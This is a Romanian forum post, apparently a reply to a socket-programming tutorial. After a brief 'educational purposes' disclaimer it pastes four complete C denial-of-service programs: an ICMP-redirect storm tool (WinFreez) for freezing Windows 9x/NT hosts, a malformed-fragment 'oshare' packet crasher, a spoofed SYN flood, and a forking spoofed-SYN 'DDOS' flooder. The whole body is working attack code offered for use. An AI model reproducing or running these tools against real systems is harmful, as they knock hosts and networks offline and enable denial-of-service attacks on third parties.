Leaderboard

Foarte bun tutorialul, dar merge numai pe Linux. O sa postez mai multe surse de pe net care fac diferite lucruri folosind socket-uri (tot pentru Linux). EDIT: Toate programele sunt prezentate doar in scopuri educative si se gasesc si pe net. WinFreez.c /* WinFreez.c by Delmore <delmore@moscowmail.com> ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN. Usage: winfreez sendtoip sendfromip time where <sendtoip> is victim host, <sendfromip> is router for victim host, <time> is time in seconds to freeze victim. Note: I've written small exploit for freeze win9x/nt boxes in LAN. Proggy initiates ICMP/Redirect-host messages storm from router (use router ip). Windows will receive redirect-host messages and change own route table, therefore it will be frozen or slowly working during this time. On victim machine route table changes viewing with: ROUTE PRINT command in ms-dos box. Exploit show different result for different system configuration. System results: p200/16ram/win95osr2 is slowly execute application after 20 seconds of storm. p233/96ram/nt4-sp4 is slowly working after 30 seconds of storm. p2-266/64ram/win95 working slowly and can't normal execute application. Compiled on RedHat Linux 5, Kernel 2.0.35 (x86) gcc ./winfreez.c -o winfreez --- for Slackware Linux, Kernel 2.0.30 If you can't compile due to ip_sum not defined errors, replace (line 207): ip->ip_sum = 0; to line: ip->ip_csum = 0; --- Soldiers Of Satan group Russia, Moscow State University, 05 march 1999 http://sos.nanko.ru Thanx to Mark Henderson. */ #define ICMP_REDIRECT 5 #include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> #include <sys/errno.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> /* #include <netinet/ip_icmp.h> */ /* * Structure of an icmp header (from sparc header). */ struct icmp { u_char icmp_type; /* type of message, see below */ u_char icmp_code; /* type sub code */ u_short icmp_cksum; /* ones complement cksum of struct */ union { u_char ih_pptr; /* ICMP_PARAMPROB */ struct in_addr ih_gwaddr; /* ICMP_REDIRECT */ struct ih_idseq { n_short icd_id; n_short icd_seq; } ih_idseq; int ih_void; } icmp_hun; #define icmp_pptr icmp_hun.ih_pptr #define icmp_gwaddr icmp_hun.ih_gwaddr #define icmp_id icmp_hun.ih_idseq.icd_id #define icmp_seq icmp_hun.ih_idseq.icd_seq #define icmp_void icmp_hun.ih_void union { struct id_ts { n_time its_otime; n_time its_rtime; n_time its_ttime; } id_ts; struct id_ip { struct ip idi_ip; /* options and then 64 bits of data */ } id_ip; u_long id_mask; char id_data[1]; } icmp_dun; #define icmp_otime icmp_dun.id_ts.its_otime #define icmp_rtime icmp_dun.id_ts.its_rtime #define icmp_ttime icmp_dun.id_ts.its_ttime #define icmp_ip icmp_dun.id_ip.idi_ip #define icmp_mask icmp_dun.id_mask #define icmp_data icmp_dun.id_data }; u_short in_cksum (u_short *addr, int len); void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ); int main (int argc, char **argv) { time_t wtime; char *sendtoip, *sendfromip; int s, on; if (argc != 4) { fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]); exit (1); } sendtoip = (char *)malloc(strlen(argv[1]) + 1); strcpy(sendtoip, argv[1]); sendfromip = (char *)malloc(strlen(argv[2]) + 1); strcpy(sendfromip, argv[2]); wtime = atol(argv[3]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf (stderr, "socket creation error\n" ); exit (1); } #ifdef IP_HDRINCL if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) { fprintf (stderr, "sockopt IP_HDRINCL error\n" ); exit (1); } #endif printf("winfreez by Delmore, <delmore@moscowmail.com>\n"); printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n"); printf("sendto = %s\n", sendtoip); printf("sendfrom = %s\n", sendfromip); printf("time = %i s\n", wtime); attack( sendtoip, sendfromip, wtime, s ); free( (void *) sendtoip ); free( (void *) sendfromip ); } void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ) { time_t curtime, endtime; int i1, i2, i3, i4; char redir[21]; char buf[100]; struct ip *ip = (struct ip *) buf; struct icmp *icmp = (struct icmp *) (ip + 1); struct hostent *hp; struct sockaddr_in dst; if(wtime==0) return; if ((hp = gethostbyname (sendtoip)) == NULL) if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1) { fprintf (stderr, "%s: unknown sendto\n", sendtoip); exit (1); } if ((hp = gethostbyname (sendfromip)) == NULL) if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1) { fprintf (stderr, "%s: unknown sendfrom\n", sendfromip); exit (1); } endtime = time(NULL) + wtime; srand((unsigned int) endtime); do { bzero (buf, sizeof buf); /* sendto/gateway */ hp = gethostbyname (sendtoip); bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length); /* sendfrom */ hp = gethostbyname (sendfromip); bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); /* generate redirect*/ i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0)); i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); bzero (redir, sizeof redir); sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 ); hp = gethostbyname (redir); bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length); ip->ip_v = 4; ip->ip_hl = sizeof *ip >> 2; ip->ip_tos = 0; ip->ip_len = htons (sizeof buf); ip->ip_id = htons (4321); ip->ip_off = 0; ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_sum = 0; /* kernel fills this in */ bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof (ip->ip_dst.s_addr)); icmp->icmp_ip.ip_v = 4; icmp->icmp_ip.ip_hl = sizeof *ip >> 2; icmp->icmp_ip.ip_tos = 0; icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */ icmp->icmp_ip.ip_id = htons (3722); icmp->icmp_ip.ip_off = 0; icmp->icmp_ip.ip_ttl = 254; icmp->icmp_ip.ip_p = 1; icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip); dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->icmp_type = ICMP_REDIRECT; icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */ icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof (*ip)); if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 ) { fprintf (stderr, "sendto error: %d\n",errno); exit (1); } }while (time(NULL)!=endtime); } /* * in_cksum -- Checksum routine for Internet Protocol family headers (C * Version) - code from 4.4 BSD */ u_short in_cksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } Cu programul urmator win95-ul si Mac-ul mai vechi picau (la win95 aparea ecran albastru). /****************************************************************************/ /* [ oshare_1_gou ver 0.1 ] -- Dressing up No.1 -- */ /* */ /* */ /* This program transmits the "oshare" packet which starts a machine aga- */ /* in or crash. But, because it can't pass through the router, it can be */ /* carried out only in the same segment. */ /* "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha- */ /* nged, it has already tested that it becomes possible to kill Mac, too. */ /* ----------------------------------------- */ /* Written by R00t Zer0 */ /* E-Mail : defcon0@ugtop.com */ /* Web URL : http://www.ugtop.com/defcon0/index.htm */ /****************************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> #include <ctype.h> #include <arpa/inet.h> #include <unistd.h> #include <string.h> #include <errno.h> u_short in_cksum( u_short *, int ); int send_oshare_packet( int, u_long ); u_short in_cksum( u_short *addr, int len ) { int nleft = len; u_short *w = addr; int sum = 0; u_short answer = 0; while( nleft > 1 ) { sum += *w++; nleft -= 2; } if (nleft == 1) { *( u_char *)( &answer ) = *( u_char *)w; sum += answer; } sum = ( sum >> 16 ) + ( sum & 0xffff ); sum += ( sum >> 16 ); answer = ~sum; return( answer ); } int send_oshare_packet( int sock_send, u_long dst_addr ) { char *packet; int send_status; struct ip *ip; struct sockaddr_in to; long lll; packet = ( char *)malloc( 40 ); ip = ( struct ip *)( packet ); memset( packet, 0, 40 ); ip->ip_v = 4; // ip->ip_hl = 11; ip->ip_tos = 0x00; // ip->ip_len = htons( 44 ); ip->ip_id = htons( 1999 ); ip->ip_off = htons( 16383 ); ip->ip_ttl = 0xff; ip->ip_p = IPPROTO_UDP; ip->ip_hl = rand() % 16; ip->ip_len = rand() % 0xffff; lll=(long)htonl( inet_addr( "1.1.1.1" )); memcpy(&ip->ip_src,&lll,sizeof(long)); memcpy(&ip->ip_dst,&dst_addr,sizeof(long)); ip->ip_sum = in_cksum( ( u_short *)ip, 44 ); to.sin_family = AF_INET; to.sin_port = htons( 0x123 ); to.sin_addr.s_addr = dst_addr; send_status = sendto( sock_send, packet, 40, 0, ( struct sockaddr *)&to, sizeof( struct sockaddr ) ); free( packet ); return( send_status ); } int main( int argc, char *argv[] ) { char tmp_buffer[ 1024 ]; int loop, loop2; int sock_send; u_long src_addr, dst_addr; u_short src_port, dst_port; struct hostent *host; struct sockaddr_in addr; time_t t; if( argc != 3 ) { printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] ); exit( -1 ); } t = time( 0 ); srand( ( u_int )t ); memset( &addr, 0, sizeof( struct sockaddr_in ) ); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr( argv[1] ); if( addr.sin_addr.s_addr == -1 ) { host = gethostbyname( argv[1] ); if( host == NULL ) { printf( "Unknown host %s.\n", argv[1] ); exit( -1 ); } addr.sin_family = host->h_addrtype; memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length ); } memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 ); if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1) { perror( "Getting raw send socket" ); exit( -1 ); } printf( "\n\"Oshare Packet\" sending" ); fflush( stdout ); for( loop = 0; loop < atoi( argv[2] ); loop++ ) { for( loop2 = 0; loop2 < 1000; loop2++ ) send_oshare_packet( sock_send, dst_addr ); fprintf( stderr, "." ); fflush( stdout ); } printf( "\n\nDone.\n\n" ); fflush( stdout ); close( sock_send ); exit( 0 ); } Syn Flood: #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #define DST_PORT 137 static char *dst_addr = "127.0.0.1"; struct pseudo_header { unsigned long src_addr; unsigned long dst_addr; unsigned char zero; unsigned char proto; unsigned short length; }__attribute__ ((packed)); int create_raw_socket(void); int send_frag_ip_pkt(int); u_short in_cksum(u_short *, int); static u_short ip_id = 0x789; int main(int argc, char *argv[]) { int sock = create_raw_socket(); int n = 0; if(argc>=2) { dst_addr = argv[1]; } srand(time(NULL)); while(1) { printf("%d: Sending IP packet ... ", n++); fflush(stdout); if(send_frag_ip_pkt(sock)<0) { perror("sendto"); return -1; } printf("done\n"); if( (n%1000)==0 ) sleep(1); } close(sock); return 0; } int create_raw_socket(void) { int sock; int on = 1; sock = socket(AF_INET, SOCK_RAW,IPPROTO_ICMP); if(sock<0) { perror("socket"); exit(1); } if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on))<0) { perror("setsockopt"); exit(1); } return sock; } int send_frag_ip_pkt(int sd) { struct sockaddr_in sin; unsigned char buf[20 + 20 +4]; unsigned char chkbuf[512]; char local_addr[32]; struct iphdr *iph; struct tcphdr*tcph; struct pseudo_header *ph; u_short *port; int i; sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(dst_addr); sin.sin_port = 0; sprintf(local_addr, "192.168.0.%u", 1 + ((unsigned)rand())%253 ); memset(buf, 0, sizeof(buf)); iph = (struct iphdr *)buf; iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(buf); iph->id = ip_id++; iph->frag_off = 0; iph->ttl = 255; iph->protocol = IPPROTO_TCP; iph->check = 0; iph->saddr = inet_addr(local_addr); iph->daddr = inet_addr(dst_addr); iph->check = in_cksum((u_short *)buf, 20); tcph = (struct tcphdr *)&buf[20]; tcph->source= htons((u_short)(2000 + rand() % 1000)); tcph->dest = htons(DST_PORT); tcph->seq = (unsigned short)rand(); tcph->ack_seq = 0; tcph->doff = 6; /* data offset */ tcph->syn = 1; tcph->window= htons(8000); tcph->check = 0; tcph->urg_ptr = 0; buf[40] = TCPOPT_MAXSEG; buf[41] = 4; *(unsigned short *)(buf + 42) = htons(1460); ph->src_addr = iph->saddr; ph->dst_addr = iph->daddr; ph->zero = 0; ph->proto = iph->protocol; ph->length = htons(sizeof(buf) - sizeof(*iph)); memcpy(chkbuf + sizeof(*ph), &buf[sizeof(*iph)], sizeof(buf) - sizeof(*iph)); tcph->check = in_cksum((u_short *)chkbuf, sizeof(buf) - sizeof(*iph) + sizeof(*ph)); return sendto(sd, buf, sizeof(buf), 0, (struct sockaddr *)&sin, sizeof(sin)); } u_short in_cksum(u_short *addr, int len) { int nleft = len; int sum = 0; u_short *w = addr; u_short answer = 0; while(nleft > 1) { sum += *w; w++; nleft -= 2; } if(nleft == 1) { *(unsigned char *)(&answer) = *(unsigned char *)w; sum += answer; } sum = (sum>>16) + (sum & 0xffff); sum += (sum>>16); answer = ~sum; return answer; } DDOS: #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <stdlib.h> #include <errno.h> #include <unistd.h> #include <stdio.h> #include <netdb.h> #define DESTPORT 80 #define LOCALPORT 8888 void send_tcp(int sockfd,struct sockaddr_in *addr); unsigned short check_sum(unsigned short *addr,int len); int main(int argc,char **argv) { int sockfd; struct sockaddr_in addr; struct hostent *host; int on=1; if(argc!=2) { fprintf(stderr,"Usage:%s hostname\n\a",argv[0]); exit(1); } bzero(&addr,sizeof(struct sockaddr_in)); addr.sin_family=AF_INET; addr.sin_port=htons(DESTPORT); if(inet_aton(argv[1],&addr.sin_addr)==0) { host=gethostbyname(argv[1]); if(host==NULL) { fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno)); exit(1); } addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]); } sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP); if(sockfd<0) { fprintf(stderr,"Socket Error:%s\n\a",strerror(errno)); exit(1); } setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)); setuid(getpid()); send_tcp(sockfd,&addr); } void send_tcp(int sockfd,struct sockaddr_in *addr) { char buffer[100]; struct ip *ip; struct tcphdr *tcp; int head_len; head_len=sizeof(struct ip)+sizeof(struct tcphdr); bzero(buffer,100); ip=(struct ip *)buffer; ip->ip_v=IPVERSION; ip->ip_hl=sizeof(struct ip)>>2; ip->ip_tos=0; ip->ip_len=htons(head_len); ip->ip_id=0; ip->ip_off=0; ip->ip_ttl=MAXTTL; ip->ip_p=IPPROTO_TCP; ip->ip_sum=0; ip->ip_dst=addr->sin_addr; tcp=(struct tcphdr *)(buffer +sizeof(struct ip)); tcp->source=htons(LOCALPORT); tcp->dest=addr->sin_port; tcp->seq=random(); tcp->ack_seq=0; tcp->doff=5; tcp->syn=1; tcp->check=0; fork(); fork(); while(1) { ip->ip_src.s_addr=random(); printf("*"); tcp->check=check_sum((unsigned short *)tcp, sizeof(struct tcphdr)); sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in)); } } unsigned short check_sum(unsigned short *addr,int len) { register int nleft=len; register int sum=0; register short *w=addr; short answer=0; while(nleft>1) { sum+=*w++; nleft-=2; } if(nleft==1) { *(unsigned char *)(&answer)=*(unsigned char *)w; sum+=answer; } sum=(sum>>16)+(sum&0xffff); sum+=(sum>>16); answer=~sum; return(answer); }